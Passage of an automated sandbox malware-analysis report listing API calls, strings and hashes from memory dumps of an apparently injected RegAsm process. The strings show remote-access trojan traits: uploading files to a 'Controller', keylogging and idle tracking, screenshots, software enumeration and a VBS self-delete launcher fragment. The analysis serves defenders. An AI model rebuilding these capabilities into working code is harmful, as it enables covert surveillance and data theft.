                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                            • _wcslen.LIBCMT ref: 0041C1CC
                            • FindVolumeClose.KERNEL32 ref: 0041C1EC
                            • GetLastError.KERNEL32 ref: 0041C204
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                            • lstrcatW.KERNEL32 ref: 0041C24A
                            • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                            • GetLastError.KERNEL32 ref: 0041C261
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            • API String ID: 3941738427-1684325040
                            • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                            • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                            • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                            • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: %m$~$Gon~$~F@7$~dra
                            • API String ID: 4218353326-230879103
                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                            • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                            • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                            • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                            • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                            • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                            • GetCursorPos.USER32(?), ref: 0041D67A
                            • SetForegroundWindow.USER32(?), ref: 0041D683
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                            • ExitProcess.KERNEL32 ref: 0041D6F6
                            • CreatePopupMenu.USER32 ref: 0041D6FC
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                            • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                            • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                            • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                            • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                            • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                            • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                            • __aulldiv.LIBCMT ref: 00408D88
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                            • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                            • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                            • CloseHandle.KERNEL32(00000000), ref: 00409037
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                            • API String ID: 3086580692-2582957567
                            • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                            • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                            • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                            • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                            • _free.LIBCMT ref: 10007CFB
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 10007D1D
                            • _free.LIBCMT ref: 10007D32
                            • _free.LIBCMT ref: 10007D3D
                            • _free.LIBCMT ref: 10007D5F
                            • _free.LIBCMT ref: 10007D72
                            • _free.LIBCMT ref: 10007D80
                            • _free.LIBCMT ref: 10007D8B
                            • _free.LIBCMT ref: 10007DC3
                            • _free.LIBCMT ref: 10007DCA
                            • _free.LIBCMT ref: 10007DE7
                            • _free.LIBCMT ref: 10007DFF
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0045138A
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                            • _free.LIBCMT ref: 0045137F
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 004513A1
                            • _free.LIBCMT ref: 004513B6
                            • _free.LIBCMT ref: 004513C1
                            • _free.LIBCMT ref: 004513E3
                            • _free.LIBCMT ref: 004513F6
                            • _free.LIBCMT ref: 00451404
                            • _free.LIBCMT ref: 0045140F
                            • _free.LIBCMT ref: 00451447
                            • _free.LIBCMT ref: 0045144E
                            • _free.LIBCMT ref: 0045146B
                            • _free.LIBCMT ref: 00451483
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                            • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                            APIs
                            • __EH_prolog.LIBCMT ref: 0041A04A
                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                            • Sleep.KERNEL32(000003E8), ref: 0041A18E
                            • GetLocalTime.KERNEL32(?), ref: 0041A196
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                            • API String ID: 489098229-1431523004
                            • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                            • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                            • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                            • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 0040A77B
                              • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                              • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                              • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                              • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: 8SG$8SG$;S$PG$PG
                            • API String ID: 3795512280-174529128
                            • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                            • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                            • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                            • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                              • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                              • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                              • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                            • ExitProcess.KERNEL32 ref: 0040D9FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-3159800282
                            • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                            • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                            • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                            • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                            • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                            • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                            • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                            APIs
                              • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                            • GetLastError.KERNEL32 ref: 00455D6F
                            • __dosmaperr.LIBCMT ref: 00455D76
                            • GetFileType.KERNEL32 ref: 00455D82
                            • GetLastError.KERNEL32 ref: 00455D8C
                            • __dosmaperr.LIBCMT ref: 00455D95
                            • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                            • CloseHandle.KERNEL32(?), ref: 00455EFF
                            • GetLastError.KERNEL32 ref: 00455F31
                            • __dosmaperr.LIBCMT ref: 00455F38
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                            • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                            • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                            • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: \&G$\&G$`&G
                            • API String ID: 269201875-253610517
                            • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                            • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                            • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                            • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                            • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                            • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                            • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040AD73
                            • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                            • GetForegroundWindow.USER32 ref: 0040AD84
                            • GetWindowTextLengthW.USER32 ref: 0040AD8D
                            • GetWindowTextW.USER32 ref: 0040ADC1
                            • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$]
                            • API String ID: 911427763-3954389425
                            • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                            • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                            • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                            • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                            • __dosmaperr.LIBCMT ref: 0043A926
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                            • __dosmaperr.LIBCMT ref: 0043A963
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                            • __dosmaperr.LIBCMT ref: 0043A9B7
                            • _free.LIBCMT ref: 0043A9C3
                            • _free.LIBCMT ref: 0043A9CA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                            • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                            • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                            • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                            • GetMessageA.USER32 ref: 0040556F
                            • TranslateMessage.USER32(?), ref: 0040557E
                            • DispatchMessageA.USER32 ref: 00405589
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                            • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
